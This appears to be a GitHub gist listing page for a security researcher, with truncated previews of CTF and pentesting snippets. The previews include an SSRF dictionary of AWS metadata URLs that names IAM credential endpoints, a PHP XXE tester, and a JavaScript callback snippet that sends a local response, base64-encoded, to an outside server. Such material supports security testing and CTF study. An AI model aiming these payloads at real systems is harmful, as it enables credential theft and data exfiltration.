I hereby claim:
- I am 0xBADCA7 on github.
- I am 0xbadca7 (https://keybase.io/0xbadca7) on keybase.
- I have a public key whose fingerprint is CD28 0146 92F1 0D3B C013 01A9 9EF4 A285 A3C0 BB4E
To claim this, I am signing this object:
netcat 0xBADCA7
0xBADCA7
/ cloud_metadata.txt
Created
August 20, 2017 12:32
— forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## AWS | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname | |
| http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
0xBADCA7
/ php_xxe_tester.php
Created
April 7, 2017 23:59
— forked from lukaskuzmiak/php_xxe_tester.php
PHP XXE tester
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| // Extended tester from ezimuel (https://gist.github.com/ezimuel/9135151) | |
| // The libxml entity loader is disabled by default | |
| // even setting the libxml_disable_entity_loader to false doesn't works! | |
| // | |
| // @see http://uk3.php.net/manual/en/function.libxml-disable-entity-loader.php | |
| // @see http://stackoverflow.com/a/10213239 | |
| // @see https://stackoverflow.com/questions/24117700 | |
| $dir = __DIR__; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| # Some useful standard functions to have around :) | |
| # check if an array contains a given value | |
| # contains "asdf" "asdf an array of values" => has exit code 0 | |
| function contains { | |
| local e; | |
| for e in "${@:2}"; do [[ "$e" == "$1" ]] && return 0; done; | |
| return 1; |
0xBADCA7
/ README.md
Created
September 13, 2016 07:42
— forked from stypr/README.md
ASIS CTF 2016 Finals: pentest (298pt)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from concurrent.futures import ThreadPoolExecutor | |
| from requests_futures.sessions import FuturesSession | |
| def outp(response): | |
| print(response) | |
| print(response.headers) | |
| print(response.text) | |
| urls = [ | |
| "https://www.google.com", |
0xBADCA7
/ solve.py
Created
May 15, 2016 20:26
— forked from elliptic-shiho/solve.py
BCTF 2016 steganography 150: midifan Writeup
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from scryptos import * | |
| d = open("out.csv").read().split("\n") | |
| bits = "" | |
| for x in d: | |
| r = x.split(", ") | |
| if len(r) > 4: | |
| if int(r[3]) == 0: | |
| if r[2] == "Note_on_c": |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * * | |
| * * @0xBADCA7 and github/0xBADCA7 | |
| * * How to serialize Java objects. This is from TUCTF 2016. | |
| * * | |
| * * Just compile on the command line (IDE will taint serialization and place package identifiers): | |
| * * javac Main.java && java Main && cat /tmp/serialized.bin | |
| * * | |
| * * */ |
0xBADCA7
/ callback.js
Last active
March 19, 2016 12:37
Collection of useful Javascript snippets when it comes to CTF or exploitation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * Fire two consecutive AJAX calls having the second one contain | |
| * the results of the first one in Base64 format. | |
| */ | |
| if (1) /* can be any guard like if (chrome) ... */ | |
| { | |
| var FIRST_ADDR = 'http://127.0.0.1:8888'; | |
| var SECOND_ADDR = 'http://myserver.net' | |
| var resp, xhr = new XMLHttpRequest(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sudo dpkg --add-architecture i386 | |
| # echo "foreign-architecture i386" > /etc/dpkg/dpkg.cfg.d/multiarch | |
| sudo apt-get update | |
| sudo apt-get install libc6:i386 libncurses5:i386 libstdc++6:i386 |